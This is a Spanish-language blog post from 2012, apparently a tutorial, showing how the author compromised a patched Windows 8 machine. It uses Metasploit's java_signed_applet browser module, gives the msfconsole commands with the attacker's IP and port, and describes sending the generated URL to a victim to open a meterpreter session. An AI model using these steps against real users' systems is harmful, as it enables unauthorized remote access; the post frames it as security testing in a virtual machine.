martes, 27 de noviembre de 2012

Explotando Windows 8 desde Metasploit


Segun Wikipedia: Windows 8 es la versión actual del sistema operativo de Microsoft Windows, producido por Microsoft para su uso en computadoras personales, incluidas computadoras de escritorio en casa y de negocios, computadoras portátiles, netbooks, tabletas, servidores y centros multimedia. Añade soporte para microprocesadores ARM, además de los microprocesadores tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido modificada para hacerla más adecuada para su uso con pantallas táctiles, además de los tradicionales ratón y teclado.
Segun Yo: La seguridad que ofrece Microsoft en esta nueva version de Windows, es la misma que se obtiene al instalar Windows 7, esto se debe a que efectivamente solo ha cambiado la interfaz grafica y ha añadido nuevos programas que lo hace mas vulnerable, simplemente por ser una version parecida a los que usan los Telefonos Moviles. La actualizacion automatica que brinda, solo sirve para actualizar el Internet Explorer y los servicios (Redes Sociales - Correo y Multimedia). El Windows Defender que se integra por default, no detecta las URL maliciosas (Exploits Kit's) ni mucho menos cuando se intenta descargar algun archivo ejecutable, solamente se pronuncia el aviso que brindan los navegadores "Desea descargar este Archivo (Permitir - Rechazar)" que es lo unico que al menos nos alerta de un supuesto Malware, por lo que simplemente Windows 8 seria el WINDOWS XP 2012.

Llegando a la conclusion y opinion personal sobre Windows 8, decide realizar las pruebas respectivas para comprobar realmente y estar 100% seguro de lo mencionado lineas arriba. Para tal caso me base en la vulnerabilidad que se puede aprovechar en todos los navegadores, la cual consiste en ejecutar cualquier URL que genera el Metasploit para poder penetrar un Windows actualizado y parcheado.
El procedimiento que realize para comprometer la seguridad de Windows 8 son los siguientes:
REQUERIMIENTOS:
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows 8 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:

------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_signed_applet (Modulo Java para diferentes navegadores)
set lhost 192.168.1.17 (IP del Atacante) 
set lport 80 (Puerto)
set uripath / (Path del link a enviar)
exploit
------------------------------------------------------------------------------------------------------------------



Despues de ejecutar los comandos mencionados, MSF generara una URL (http://192.168.1.17:8080) que sera enviada a la victima con Windows 8, esta contendra un archivo (.exe) que se autoejecutara al momento de abrirlo en cualquier navegador web, ya sea en Internet Explorer 10 (version que integra Windows 8) Google Chorme, Opera o Firefox.

He aqui un ejemplo de la session meterpreter que se crea al momento de ejecutar la URL generada por Metasploit:




Esto quiere decir que hemos VULNERADO el Windows 8 con una simple URL, seguidamente ejecutaremos los comandos correspondientes para obtener la informacion del sistema.
Las pruebas fueron realizadas en el Sistema Operativo Windows 8 con el Firewall, Windows Defender, Actualizaciones Automaticas, Internet Explorer 10 (modo seguro) respectivamente ACTIVADO.
Si desean realizar sus propias Pruebas de Seguridad, pueden descargar el Windows 8 e instalarlo en una Maquina Virtual, recomendable usar el VMWARE, los .iso se encuentran disponibles desde los siguientes link's:
Saludos.
 

0 comentarios:

Publicar un comentario